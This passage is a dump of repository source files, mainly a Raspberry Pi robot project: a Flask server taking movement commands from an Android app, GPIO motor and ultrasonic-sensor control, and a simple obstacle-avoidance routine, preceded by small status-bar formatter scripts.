''.join(('<span style=\"color: ', c, '\">', s, '</span>')),\n connector=' <span style=\"font-weight: bold\">|</span> ',\n quote_connectors=False,\n )\n)\n" }, { "alpha_fraction": 0.5833333134651184, "alphanum_fraction": 0.6074561476707458, "avg_line_length": 75, "blob_id": "5b9497569f66d505b94f970de6670f27035d63f5", "content_id": "1653063429f41e2f75b2940e4720d8d8a7dc4759", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 912, "license_type": "no_license", "max_line_length": 276, "num_lines": 12, "path": "/demos/cgi-bin/cgi_html.sh", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env sh\n# uses hebcal <http://danny.sadinoff.com/hebcal/>\n# can be run using a CGI server (for example busybox <http://busybox.net/> httpd -f -p 8000, or python <http://www.python.org/> -m CGIHTTPServer), and going to <http://localhost:8000/cgi-bin/[name_of_this_file]>\nD=\"$(dirname \"$(dirname \"$(readlink -f \"$(dirname \"$(which \"$0\" || echo \"$0\")\")\")\")\")\"\ndidir=\"$D\"\n\nprintf 'Content-Type: text/html\\r\\n\\r\\n'\nprintf '<html><head><meta http-equiv=\"refresh\" content=\"1; url=\"'\necho \"$REQUEST_URI\" | head -c -1\nprintf '\"><title>Jewcal</title></head><body style=\"background: black; color: white\"><p>'\necho \"$(printf '[{\"cmd\": \"hebcal -T | head -1\", \"color\": \"#0770ff\"}, \" \", {\"cmd\": \"date +%%a\", \"color\": \"#07ff70\"}, \" \", {\"cmd\": \"date '; printf \"'+%%I:%%M:%%S %%p'\"; printf '\",\"color\": \"#ffffff\"}]'; printf '')\" | $didir/processors/run.py | $didir/outputs/html.py | head -c -1\nprintf '</p</body></html>'\n" }, { "alpha_fraction": 0.5604650974273682, "alphanum_fraction": 0.5604650974273682, "avg_line_length": 29.714284896850586, "blob_id": "90a59b1cdbcd186e66760a81eb29fbb45bfe7dca", "content_id": "bbb74e5ffff358fc68e3960c69ca1026a593230e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 430, "license_type": "no_license", "max_line_length": 74, "num_lines": 14, "path": "/outputs/conky.py", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# to be used with conky execp, for example: conky -t '${execp <command>}'\nimport json\nimport util\n\nutil.outputter(\n lambda line: util.connect_dicts(\n filter(lambda d: d['text'].strip() != '', json.loads(line)),\n quoter=lambda s: s.replace('$', '$$'),\n colorer=lambda c, s: ''.join(('${color ', c, '}', s, '${color}')),\n connector=' | ',\n quote_connectors=False,\n )\n)\n" }, { "alpha_fraction": 0.648754894733429, "alphanum_fraction": 0.656618595123291, "avg_line_length": 53.5, "blob_id": "86f630d994a1c8e8c95da00f7aadc3e9cfb865a9", "content_id": "6c3a0fe4b725d6208b856788f7be832ae1da8aef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 763, "license_type": "no_license", "max_line_length": 406, "num_lines": 14, "path": "/outputs/tmux.py", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# For use with options status-left, status-right, and similar options, by wrapping the command to display a line in \"#(<commands to sh>)\" (including the quotes). *-bg options can be used to change the background colors; *-interval changes how often it is refreshed (so also reran); *-length changes how large the display area is. (color rgb codes are supported from version 1.5 (released in 2011) onwards.)\nimport json\nimport util\n\nutil.outputter(\n lambda line: util.connect_dicts(\n filter(lambda d: d['text'].strip() != '', json.loads(line)),\n quoter=lambda s: s.replace('#', '##'),\n colorer=lambda c, s: ''.join(('[#fg=', c, ']', s, '#[fg=default]')),\n connector='|',\n quote_connectors=False,\n )\n)\n" }, { "alpha_fraction": 0.6774193644523621, "alphanum_fraction": 0.6967741847038269, "avg_line_length": 37.75, "blob_id": "5a22332d2d800b0d3b51b592713cac403754523d", "content_id": "94f04657c45bb56056b9429816b2c9ea6053aa25", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 310, "license_type": "no_license", "max_line_length": 127, "num_lines": 8, "path": "/processors/wait.py", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n'''wait the specified amount of time (in seconds), default 1'''\nimport time\nimport sys\nimport util\n\ninterval = float(sys.argv[1] if (len(sys.argv) > 1) else 1)\nutil.fifo_handler(iter(sys.stdin.readline, ''), sys.stdout, after_fn=lambda i: ((interval > 0) and time.sleep(interval),())[1])\n" } ]
15
nenadlazic/RPiRobot
https://github.com/nenadlazic/RPiRobot
3980c3d94f1b860848d3066a694479f74a3af163
60d68700c0c4f98b1a20780d4012309d199642e0
9f70bb99a246a9d9e5634207b8b4527c0628d40b
refs/heads/master
2020-03-26T05:55:45.596470
2018-08-31T11:35:02
2018-09-02T22:36:28
144,581,333
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6747676730155945, "alphanum_fraction": 0.6804860830307007, "avg_line_length": 28.787233352661133, "blob_id": "ba595dc4d8f2747abcb43627309fe91c9a5fa613", "content_id": "0f7d6b3fe9542209fa9fc7396aa24f6f07b1be1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1399, "license_type": "no_license", "max_line_length": 85, "num_lines": 47, "path": "/Android application/rpidroid_robot/app/src/main/java/matf/beograd/master/nenadlazic/rpidroid_robot/SingletonVolley.java", "repo_name": "nenadlazic/RPiRobot", "src_encoding": "UTF-8", "text": "/**\n * Created by nlazic on 12/26/2017.\n */\npackage matf.beograd.master.nenadlazic.rpidroid_robot;\n\nimport android.content.Context;\n\nimport com.android.volley.Request;\nimport com.android.volley.RequestQueue;\nimport com.android.volley.toolbox.Volley;\n\npublic class SingletonVolley {\n private static SingletonVolley mInstance;\n private RequestQueue mRequestQueue;\n private static Context mContext;\n\n public SingletonVolley(Context context) {\n // Specify the application context\n mContext = context;\n // Get the request queue\n mRequestQueue = getRequestQueue();\n }\n\n public static synchronized SingletonVolley getInstance(Context context) {\n // If Instance is null then initialize new Instance\n if (mInstance == null) {\n mInstance = new SingletonVolley(context);\n }\n // Return SingletonVolley new Instance\n return mInstance;\n }\n\n public RequestQueue getRequestQueue() {\n // If RequestQueue is null the initialize new RequestQueue\n if (mRequestQueue == null) {\n mRequestQueue = Volley.newRequestQueue(mContext.getApplicationContext());\n }\n\n // Return RequestQueue\n return mRequestQueue;\n }\n\n public <T> void addToRequestQueue(Request<T> request) {\n // Add the specified request to the request queue\n getRequestQueue().add(request);\n }\n}" }, { "alpha_fraction": 0.5930232405662537, "alphanum_fraction": 0.5930232405662537, "avg_line_length": 23.714284896850586, "blob_id": "90336763dedeee2e29c94cf399ad18ce92be20ac", "content_id": "af3cd4bd016d2250be0c5d269e71de7a1672e25f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 172, "license_type": "no_license", "max_line_length": 64, "num_lines": 7, "path": "/Web application - test/master_web_app/direction_service.php", "repo_name": "nenadlazic/RPiRobot", "src_encoding": "UTF-8", "text": "<?php\n$myfile = fopen(\"test.php\", \"w\") or die(\"Unable to open file!\");\n$txt = 'Hello ' . htmlspecialchars($_POST[\"name\"]) . '!';\nfwrite($myfile, $txt);\nfclose($myfile);\n\n?>" }, { "alpha_fraction": 0.8203834295272827, "alphanum_fraction": 0.8304742574691772, "avg_line_length": 65.13333129882812, "blob_id": "542ab1d96cec900b151f5dcf3e6eea463c667bd3", "content_id": "59487be2bbc67a8e8211800242d5f3f16785a20a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 991, "license_type": "no_license", "max_line_length": 209, "num_lines": 15, "path": "/README.md", "repo_name": "nenadlazic/RPiRobot", "src_encoding": "UTF-8", "text": "Ovaj repozitorijum sadrzi moj master rad na temu:\n\n# Daljinska kontrola robota sa Android uredjaja #\n\nNapravljen je mali mobilni robot koji se krece pomocu tockova i motora na njima. Robot se kontrolise Raspberry Pi racunarom na njemu i prihvata komande od Android aplikacijom na mobilnm telefonu.\nRobot na sebi ima senzore distance pomocu kojih dobija informaciju o spoljnom svetu i koristeci te informacije i implementirani BUG algoritam zna da se samostalno krece i zaobilazi prepreke na nepoznatoj mapi.\n\nIzvorni kod Android aplikacije mozete videti na putanji:\nhttps://github.com/nenadlazic/RPiRobot/tree/master/Android%20application/rpidroid_robot/app/src/main/java/matf/beograd/master/nenadlazic/rpidroid_robot\n\nIzvorni kod Raspberry Pi aplikacije mozete videti na putanji:\nhttps://github.com/nenadlazic/RPiRobot/tree/master/RPI%20application\n\nPDF master rada se nalazi na putanji:\nhttps://github.com/nenadlazic/RPiRobot/blob/master/Master%20thesis%20-%20text/rpidroid-nenad-lazic.pdf" }, { "alpha_fraction": 0.5812512636184692, "alphanum_fraction": 0.5974488854408264, "avg_line_length": 35.914798736572266, "blob_id": "2cace2fa2872402c2ad56000405d6d233ba2615a", "content_id": "fde5acf2676423fb0d9baaa7714f57650e6b80f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24699, "license_type": "no_license", "max_line_length": 152, "num_lines": 669, "path": "/RPI application/app.py", "repo_name": "nenadlazic/RPiRobot", "src_encoding": "UTF-8", "text": "# pscp app.py [email protected]:/home/pi\nimport _thread\nimport threading\nimport collections\nimport RPi.GPIO as GPIO\nimport random\nfrom flask import Flask\nfrom flask import request\nfrom time import sleep\nfrom threading import Thread\nfrom enum import Enum\nimport json\n\n# Tipovi poruka koje se razmenjuju\nclass RPi_MSG_TYPE(Enum):\n RPi_MSG_INVALID = (-1),\n RPi_MSG_DIRECTION = 0,\n RPi_MSG_CONNECTING = 1,\n RPi_MSG_DISCONNECTING = 2,\n RPi_MSG_AUTO_MODE = 3,\n RPi_MSG_RESPONSE_OK = 4,\n RPi_MSG_RESPONSE_FAILURE = 5,\n RPi_MSG_RESPONSE_OBSTRACLE = 6,\n RPi_MSG_UNDEFINED = 7\n\n# Moguci pravci kretanja\nclass RPi_DIRECTION(Enum):\n RPi_INVALID = (-1),\n RPi_STAND = 0,\n RPi_GO_AHEAD = 1,\n RPi_GO_AHEAD_SEMI_LEFT = 2,\n RPi_GO_AHEAD_SEMI_RIGHT = 3,\n RPi_GO_LEFT = 4,\n RPi_GO_RIGHT = 5,\n RPi_GO_BACK = 6,\n RPi_GO_BACK_SEMI_LEFT = 7,\n RPi_GO_BACK_SEMI_RIGHT = 8\n\n# Rezim rada robota\nclass RPi_AUTO_MODE(Enum):\n RPi_AUTO_MODE_INVALID = (-1),\n RPi_AUTO_MODE_ENABLED = 0,\n RPi_AUTO_MODE_DISABLED = 1\n\n# Moguci odgovori robota\nclass RPi_RESPONSE_OBSTRACLE(Enum):\n RPi_RESPONSE_INVALID = (-1),\n RPi_RESPONSE_OK = 0,\n RPi_FAILURE = 1,\n RPI_OBSTRACLE_DETECTED = 2,\n RPI_OBSTRACLE_PASSED = 3\n\n# Moguce strane obilaska prepreke\nclass RPi_SIDE(Enum):\n RPi_SIDE_INVALID = (-1),\n RPi_SIDE_LEFT = 0,\n RPi_SIDE_RIGHT = 1,\n RPi_SIDE_CANNOT_DECIDE = 2\n\n\n# -------------------------MODUL ZA KONTROLU HARDVERA BEGIN--------------------------\ndef checkSensors():\n # Ocitava distancu do prepreke za svaki senzor\n # sensor 1\n PIN_TRIGGER = 7\n PIN_ECHO = 11\n\n d_left = -1\n d_ahead = -1\n d_right = -1\n\n # sensor 2\n PIN_TRIGGER = 13\n PIN_ECHO = 15\n\n d_left1 = -1\n d_ahead1 = -1\n d_right1 = -1\n\n # sensor 3\n PIN_TRIGGER = 29\n PIN_ECHO = 31\n\n d_left2 = -1\n d_ahead2 = -1\n d_right2 = -1\n\n\n GPIO.setup(PIN_TRIGGER,GPIO.OUT)\n GPIO.setup(PIN_ECHO,GPIO.IN)\n \n GPIO.setup(PIN_TRIGGER1,GPIO.OUT)\n GPIO.setup(PIN_ECHO1,GPIO.IN)\n \n GPIO.setup(PIN_TRIGGER2,GPIO.OUT)\n GPIO.setup(PIN_ECHO2,GPIO.IN)\n \n GPIO.output(PIN_TRIGGER,GPIO.LOW)\n GPIO.output(PIN_TRIGGER1,GPIO.LOW)\n GPIO.output(PIN_TRIGGER2,GPIO.LOW)\n \n print(\"Calculate distance\")\n \n # ------sensor ----------\n GPIO.output(PIN_TRIGGER,GPIO.HIGH) #signalizira senzoru da emituje signal\n \n time.sleep(0.00001)\n GPIO.output(PIN_TRIGGER,GPIO.LOW)\n \n while GPIO.input(PIN_ECHO)==0:\n pulse_start_time = time.time() # vreme slanja signala\n \n while GPIO.input(PIN_ECHO)==1:\n pulse_end_time = time.time() # vreme dobijanja odbijenog signala\n \n pulse_duration = pulse_end_time - pulse_end_time\n distance = round ( pulse_duration * 17150, 2)\n d_ahead = distance\n \n # ------sensor 1----------\n GPIO.output(PIN_TRIGGER1,GPIO.HIGH) #signalizira senzoru 1 da emituje signal\n \n time.sleep(0.00001)\n GPIO.output(PIN_TRIGGER1,GPIO.LOW)\n \n while GPIO.input(PIN_ECHO1)==0:\n pulse_start_time1 = time.time() # vreme slanja signala\n \n while GPIO.input(PIN_ECHO1)==1:\n pulse_end_time1 = time.time() # vreme dobijanja odbijenog signala\n \n pulse_duration1 = pulse_end_time1 - pulse_end_time1\n distance1 = round ( pulse_duration1 * 17150, 2)\n d_left = distance1\n\n # ------sensor 2----------\n GPIO.output(PIN_TRIGGER2,GPIO.HIGH) #signalizira senzoru 2 da emituje signal\n \n time.sleep(0.00001)\n GPIO.output(PIN_TRIGGER2,GPIO.LOW)\n \n while GPIO.input(PIN_ECHO2)==0:\n pulse_start_time2 = time.time() # vreme slanja signala\n \n while GPIO.input(PIN_ECHO2)==1:\n pulse_end_time2 = time.time() # vreme dobijanja odbijenog signala\n \n pulse_duration2 = pulse_end_time2 - pulse_end_time2\n distance2 = round ( pulse_duration2 * 17150, 2)\n d_right = distance2 \n \n print(\" Razdaljina ahead: \" ,distance/2, \" cm \", \" left: \",distance1/2,\" cm, right: \",distance2/2, \"cm\")\n \n return (d_left, d_ahead, d_right)\n\ndef checkObstracle():\n d_left, d_ahead, d_right = checkSensors()\n \n if d_ahead < 20:\n return True\n \n return False\n\ndef turnLeft5Degrees():\n # Desni motor pinovi\n motor_right_1A = 3 # Pinovi 2 i 3 odredjuju smer okretanja desnog motora\n motor_right_2A = 2\n motor_right_12EN = 4 # Pin za ukljucivanje i iskljucivanje desnog motora\n\n # Levi motor pinovi\n motor_left_3A = 20 # Pinovi 16 i 20 odredjuju smer okretanja levog motora\n motor_left_4A = 16\n motor_left_34EN = 21 # Pin za ukljucivanje i iskljucivanje levog motora\n\n # Skrece u levo pod uglom od 5 stepeni\n print(\"TURN LEFT 5 degrees\")\n GPIO.output(motor_right_1A, GPIO.HIGH)\n GPIO.output(motor_right_2A, GPIO.LOW)\n GPIO.output(motor_left_34EN, GPIO.LOW)\n GPIO.output(motor_right_12EN, GPIO.HIGH)\n sleep(0.04)\n GPIO.output(motor_right_12EN, GPIO.LOW)\n\n return RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_OK\n \ndef turnRight5Degrees():\n # Skrece u desno pod uglom od 5 stepeni\n # Desni motor pinovi\n motor_right_1A = 3 # Pinovi 2 i 3 odredjuju smer okretanja desnog motora\n motor_right_2A = 2\n motor_right_12EN = 4 # Pin za ukljucivanje i iskljucivanje desnog motora\n\n # Levi motor pinovi\n motor_left_3A = 20 # Pinovi 16 i 20 odredjuju smer okretanja levog motora\n motor_left_4A = 16\n motor_left_34EN = 21 # Pin za ukljucivanje i iskljucivanje levog motora\n\n # Skrece u desno pod uglom od 5 stepeni\n print(\"TURN RIGHT 5 degrees\")\n GPIO.output(motor_left_3A, GPIO.HIGH)\n GPIO.output(motor_left_4A, GPIO.LOW)\n GPIO.output(motor_right_12EN, GPIO.LOW)\n GPIO.output(motor_left_34EN, GPIO.HIGH)\n \n sleep(0.06)\n GPIO.output(motor_left_34EN, GPIO.LOW)\n \n return RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_OK\n\ndef turnLeft10Degrees():\n turnLeft5Degrees()\n turnLeft5Degrees()\n\n return RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_OK\n\ndef turnRight10Degrees():\n turnRight5Degrees()\n turnRight5Degrees()\n\n return RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_OK\n \n \ndef goAhead():\n # Krece se napred\n print(\"GO AHEAD\")\n GPIO.output(motor_left_3A, GPIO.HIGH)\n GPIO.output(motor_left_4A, GPIO.LOW)\n GPIO.output(motor_right_1A, GPIO.HIGH)\n GPIO.output(motor_right_2A, GPIO.LOW)\n\n obstracleDetected = False\n \n for i in range(0,10):\n obstracleDetected = checkObstracle()\n\n if obstracleDetected:\n break\n\n GPIO.output(motor_left_34EN, GPIO.HIGH)\n GPIO.output(motor_right_12EN, GPIO.HIGH)\n sleep(0.04)\n GPIO.output(motor_left_34EN, GPIO.LOW)\n sleep(0.01)\n GPIO.output(motor_right_12EN, GPIO.LOW)\n \n if obstracleDetected:\n print(\"Obstracle detected\")\n return RPi_RESPONSE_OBSTRACLE.RPI_OBSTRACLE_DETECTED\n \n return RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_OK\n \ndef goBack():\n # Krece se nazad\n print(\"GO BACK\")\n GPIO.output(motor_left_3A, GPIO.LOW)\n GPIO.output(motor_left_4A, GPIO.HIGH)\n GPIO.output(motor_right_1A, GPIO.LOW)\n GPIO.output(motor_right_2A, GPIO.HIGH)\n\n for i in range(0,10):\n GPIO.output(motor_left_34EN, GPIO.HIGH)\n GPIO.output(motor_right_12EN, GPIO.HIGH)\n sleep(0.04)\n GPIO.output(motor_left_34EN, GPIO.LOW)\n sleep(0.01)\n GPIO.output(motor_right_12EN, GPIO.LOW)\n \n return RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_OK\n \ndef stand():\n # Iskljucuje motore\n GPIO.output(motor_right_12EN, GPIO.LOW)\n GPIO.output(motor_left_34EN, GPIO.LOW)\n\n return RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_OK\n\ndef ControlGPIO():\n global lock\n global ContextRPi\n\n while True:\n print(\"CONTROL GPIO\")\n\n lock.acquire()\n try:\n # Citanje vrednosti iz Context-a\n msg_type = ContextRPi.RPI_DROID_COMMAND_MSG_TYPE\n direction = ContextRPi.RPI_DROID_DIRECTION\n finally:\n lock.release()\n \n return_value = RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_INVALID\n\n if msg_type != RPi_DIRECTION.RPi_INVALID:\n if direction == RPi_DIRECTION.RPi_GO_AHEAD_SEMI_LEFT or direction == RPI_DIRECTION.RPi_GO_BACK_SEMI_RIGHT:\n return_value = turnLeft5Degrees()\n elif direction == RPi_DIRECTION.RPi_GO_AHEAD_SEMI_RIGHT or direction == RPI_DIRECTION.RPi_GO_BACK_SEMI_LEFT:\n return_value = turnRight5Degrees()\n elif direction == RPi_DIRECTION.RPi_GO_LEFT:\n return_value = turnLeft5Degrees()\n return_value = turnLeft5Degrees()\n return_value = turnLeft5Degrees()\n elif direction == RPi_DIRECTION.RPi_GO_RIGHT:\n return_value = turnRight5Degrees()\n return_value = turnRight5Degrees()\n return_value = turnRight5Degrees()\n elif direction == RPi_DIRECTION.RPi_GO_AHEAD:\n return_value = goAhead()\n elif direction == RPi_DIRECTION.RPi_GO_BACK:\n return_value = goBack()\n elif direction == RPi_DIRECTION.STAND or direction == RPi_DIRECTION.RPi_INVALID:\n return_value = stand()\n \n # Azuriranje Contexta\n ContextRPi.RPI_RESPONSE = return_value\n\n if return_value == RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_INVALID or return_value == RPi_RESPONSE_OBSTRACLE.RPi_FAILURE:\n print(\"Command failure - send notification\")\n elif return_value == RPi_RESPONSE_OBSTRACLE.RPI_OBSTRACLE_DETECTED:\n print(\"Obstracle detected - send notification\")\n elif return_value == RPi_RESPONSE_OBSTRACLE.RPI_OBSTRACLE_PASSED:\n print(\"Obstracle passed\")\n elif return_value == RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_OK:\n print(\"Command executed successfully\")\n\n sleep(0.5) # in seconds\n# --------------------------MODUL ZA KONTROLU HARDVERA END---------------------------\n \n# -------------------------MODUL ZA AUTONOMNO KRETANJE BEGIN-------------------------\ndef checkTarget():\n # provera da li je cilj dostignut odn prepreka zaobidjena\n if Y_coordinate > 0 and X_coordinate == 0:\n ContextRPi.RPI_RESPONSE = RPi_RESPONSE_OBSTRACLE.RPI_OBSTRACLE_PASSED\n return True\n else:\n return False\n \n\ndef chooseTheSide(flag):\n # Proverava senzore i analizom rezoltata bira stranu sa koje zaobilazi prepreku\n d_left_curr, d_ahead_curr, d_right_curr = checkSensors()\n\n # Pravi mali zaokret u levo i ponovo proverava senzore\n turnLeft10Degrees()\n d_left_curr_l1, d_ahead_curr_l1, d_right_curr_l1 = checkSensors()\n # Pravi jos jedan mali zaokret u levo i ponovo proverava senzore\n turnLeft10Degrees()\n d_left_curr_l2, d_ahead_curr_l2, d_right_curr_l2 = checkSensors()\n \n # Vraca se u prvobitan polozaj\n turnRight10Degrees()\n turnRight10Degrees()\n \n # Pravi mali zaokret u desno i ponovo proverava senzore\n turnRight10Degrees()\n d_left_curr_r1, d_ahead_curr_r1, d_right_curr_r1 = checkSensors()\n\n # Pravi jos jedan mali zaokret u desno i ponovo proverava senzore\n turnRight10Degrees()\n d_left_curr_r2, d_ahead_curr_r2, d_right_curr_r2 = checkSensors()\n\n # Vraca se u prvobitan polozaj\n turnLeft10Degrees()\n turnLeft10Degrees()\n \n sum_left = d_left_curr + d_left_curr_l1 + d_ahead_curr_l1 + d_left_curr_l2 + d_ahead_curr_l2 + d_left_curr_r1 + d_left_curr_r2\n sum_right = d_right_curr + d_right_curr_l1 + d_right_curr_l2 + d_ahead_curr_r1 + d_right_curr_r1 + d_ahead_curr_r2 + d_right_curr_r2\n \n sum_left1 = d_ahead_curr_l1 + d_ahead_curr_l2 + d_left_curr_r2\n sum_right1 = d_ahead_curr_r1 + d_ahead_curr_r2 + d_right_curr_l2\n \n if ContextRPi.prevSide != RPi_SIDE.RPi_SIDE_INVALID and flag == False:\n return ContextRPi.prevSide\n elif ContextRPi.prevSide != RPi_SIDE.RPi_SIDE_INVALID and flag == True:\n if sum_left1 >= sum_right1:\n return RPi_SIDE.RPi_SIDE_LEFT\n else:\n return RPi_SIDE.RPi_SIDE_RIGHT\n elif ContextRPi.prevSide == RPi_SIDE.RPi_SIDE_INVALID:\n if sum_left == sum_right:\n return RPi_SIDE.RPi_SIDE_CANNOT_DECIDE\n elif sum_left > sum_right:\n return RPi_SIDE.RPi_SIDE_LEFT\n elif sum_left < sum_right:\n return RPi_SIDE.RPi_SIDE_RIGHT\n \n \n return RPi_SIDE.RPi_SIDE_CANNOT_DECIDE\n\n \ndef BUGAlgorithm():\n flagGo = False\n side = RPi_SIDE.RPi_SIDE_INVALID\n obstracleDetected = RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_INVALID\n targetReached = False\n X_coordinate = 0\n Y_coordinate = 0\n Angle = 0\n\n\n while(ContextRPi.RPI_AUTO_MODE_ENABLED == RPi_AUTO_MODE.RPi_AUTO_MODE_ENABLED):\n \n # Provera da li je cilj dostignut\n targetReached = checkTarget()\n if targetReached == True:\n turns = Angle/5\n turns = int(turns)\n if turns < 0:\n turns = -turns\n \n for i in range(0,turns):\n if Angle < 0:\n turnRight5Degrees()\n else:\n turnLeft5Degrees()\n\n print(\"Cilj dostignut(prepreka zaobidjena) -> nastavljam dalje napred\")\n break\n\n # Kretanje napred\n obstracleDetected = goAhead()\n while obstracleDetected == RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_OK: # ide napred sve dok moze\n flagGo = True\n Y_coordinate = 8.9\n obstracleDetected = goAhead()\n \n if obstracleDetected == RPi_RESPONSE_OBSTRACLE.RPI_OBSTRACLE_DETECTED:\n # Bira stranu sa koje obilazi prepreku\n ContextRPi.prevSide = side\n side = chooseTheSide(flagGo)\n \n if side == RPi_SIDE.RPi_SIDE_LEFT: # Pokusava obilazak sa leve strane\n flagGo = False \n turnLeft5Degrees()\n Angle = Angle - 5\n elif side == RPi_SIDE.RPi_SIDE_RIGHT: # pokusava obilazak sa desne strane\n flagGo = False\n turnRight5Degrees()\n Angle = Angle + 5\n elif side == RPi_SIDE.RPi_SIDE_CANNOT_DECIDE:\n print(\"Ne mogu da odlucim sa koje strane da obidjem prepreku, biram random\")\n randNumber = random.random()\n if randNumber < 0.5:\n side = RPi_SIDE.RPi_SIDE_LEFT\n flagGo = False # Pokusava obilazak sa leve strane\n turnLeft5Degrees()\n Angle = Angle - 5\n else:\n side = RPi_SIDE.RPi_SIDE_RIGHT\n flagGo = False # Pokusava obilazak sa leve strane\n turnRight5Degrees()\n Angle = Angle + 5\n elif side == RPi_SIDE.RPi_SIDE_INVALID:\n print(\"ERROR chooseSide\")\n \n# -------------------------_MODUL ZA AUTONOMNO KRETANJE END-_------------------------\n \n# ----------------------------MODUL ZA KOMUNIKACIJU BEGIN----------------------------\ndef FlaskApplication():\n app = Flask(__name__)\n\n @app.route('/', methods=['POST'])\n def index():\n data = request.data\n req_data = request.get_json()\n message_type = req_data['message_type']\n value = req_data['value']\n str_msg_type = str(message_type)\n print(\"Dobijeno u zahtevu:\"+str_msg_type+\" \"+value)\n\n global ContextRPi\n global lock\n\n lock.acquire()\n try:\n # ########### RPi_MSG_DIRECTION BEGIN #########\n if str_msg_type.find(\"RPi_MSG_DIRECTION\") != -1:\n\n # Samo ako auto mod nije ukljucen zahtev sa aplikacije\n # moze da menja Context u suprotnom to moze samo BUGAlgorithm funkcija\n if ContextRPi.RPI_AUTO_MODE_ENABLED == RPi_AUTO_MODE.RPi_AUTO_MODE_INVALID:\n # ContextRPi.RPI_DROID_COMMAND_MSG_TYPE = RPi_MSG_TYPE.RPi_MSG_DIRECTION\n\n if value.find(\"0 stand\") != -1:\n print(\"KOMANDA ZA KRETANJE: STANI\")\n ContextRPi.update_context_direction(RPi_MSG_TYPE.RPi_MSG_DIRECTION, RPi_DIRECTION.RPi_STAND)\n elif value.find(\"1 go_ahead\") != -1:\n print(\"KOMANDA ZA KRETANJE: IDI NAPRED\")\n ContextRPi.update_context_direction(RPi_MSG_TYPE.RPi_MSG_DIRECTION, RPi_DIRECTION.RPi_GO_AHEAD)\n elif value.find(\"2 semi_left\") != -1:\n print(\"KOMANDA ZA KRETANJE: IDI POLU LEVO\")\n ContextRPi.update_context_direction(RPi_MSG_TYPE.RPi_MSG_DIRECTION, RPi_DIRECTION.RPi_GO_AHEAD_SEMI_LEFT)\n elif value.find(\"3 semi_right\") != -1:\n print(\"KOMANDA ZA KRETANJE: IDI POLU DESNO\")\n ContextRPi.update_context_direction(RPi_MSG_TYPE.RPi_MSG_DIRECTION, RPi_DIRECTION.RPi_GO_AHEAD_SEMI_RIGHT)\n elif value.find(\"4 left\") != -1:\n print(\"KOMANDA ZA KRETANJE: IDI LEVO\")\n ContextRPi.update_context_direction(RPi_MSG_TYPE.RPi_MSG_DIRECTION, RPi_DIRECTION.RPi_GO_LEFT)\n elif value.find(\"5 right\") != -1:\n print(\"KOMANDA ZA KRETANJE: IDI DESNO\")\n ContextRPi.update_context_direction(RPi_MSG_TYPE.RPi_MSG_DIRECTION, RPi_DIRECTION.RPi_GO_RIGHT)\n elif value.find(\"6 back\") != -1:\n print(\"KOMANDA ZA KRETANJE: IDI NAZAD\")\n ContextRPi.update_context_direction(RPi_MSG_TYPE.RPi_MSG_DIRECTION, RPi_DIRECTION.RPi_GO_BACK)\n elif value.find(\"7 back semi left\") != -1:\n print(\"KOMANDA ZA KRETANJE: IDI NAZAD POLU LEVO\")\n ContextRPi.update_context_direction(RPi_MSG_TYPE.RPi_MSG_DIRECTION, RPi_DIRECTION.RPi_GO_BACK_SEMI_LEFT)\n elif value.find(\"8 back semi right\") != -1:\n print(\"KOMANDA ZA KRETANJE: IDI NAZAD POLU DESNO\")\n ContextRPi.update_context_direction(RPi_MSG_TYPE.RPi_MSG_DIRECTION, RPi_DIRECTION.RPi_GO_BACK_SEMI_RIGHT)\n elif ContextRPi.RPI_AUTO_MODE_ENABLED == True:\n print(\"AUTO MOD ukljucen - ignorisem naredbe za smer\")\n # ########### RPi_MSG_DIRECTION END ###########\n\n # ########### RPi_MSG_CONNECTING BEGIN ############\n elif str_msg_type.find(\"RPi_MSG_CONNECTING\") != -1:\n ContextRPi.update_context_conn(RPi_MSG_TYPE.RPi_MSG_CONNECTING, True)\n print(\"Uspostavljanje veze\")\n ContextRPi.threadControlGPIO.start()\n # ######### RPi_MSG_CONNECTING END ############\n\n # ########## RPi_MSG_DISCONNECTING BEGIN ############\n elif str_msg_type.find(\"RPi_MSG_DISCONNECTING\") != -1:\n ContextRPi.update_context_conn(RPi_MSG_TYPE.RPi_MSG_DISCONNECTING, False)\n print(\"Prekidanje veze\")\n ContextRPi.threadControlGPIO.join()\n # ############ RPi_MSG_DISCONNECTING END #############\n\n # ############## RPi_MSG_AUTO_MODE BEGIN #############\n elif str_msg_type.find(\"RPi_MSG_AUTO_MODE\") != -1:\n if value.find(\"enable_auto_mode\") != -1:\n ContextRPi.update_context_auto_mode(RPi_MSG_TYPE.RPi_MSG_AUTO_MODE, RPi_AUTO_MODE.RPi_AUTO_MODE_ENABLED)\n ContextRPi.threadBUG.start()\n print(\"Enable auto mode\")\n elif value.find(\"disable_auto_mode\") != -1:\n ContextRPi.update_context_auto_mode(RPi_MSG_TYPE.RPi_MSG_AUTO_MODE, RPi_AUTO_MODE.RPi_AUTO_MODE_DISABLED)\n print(\"Disable auto mode\")\n ContextRPi.threadBUG.join()\n # ########## 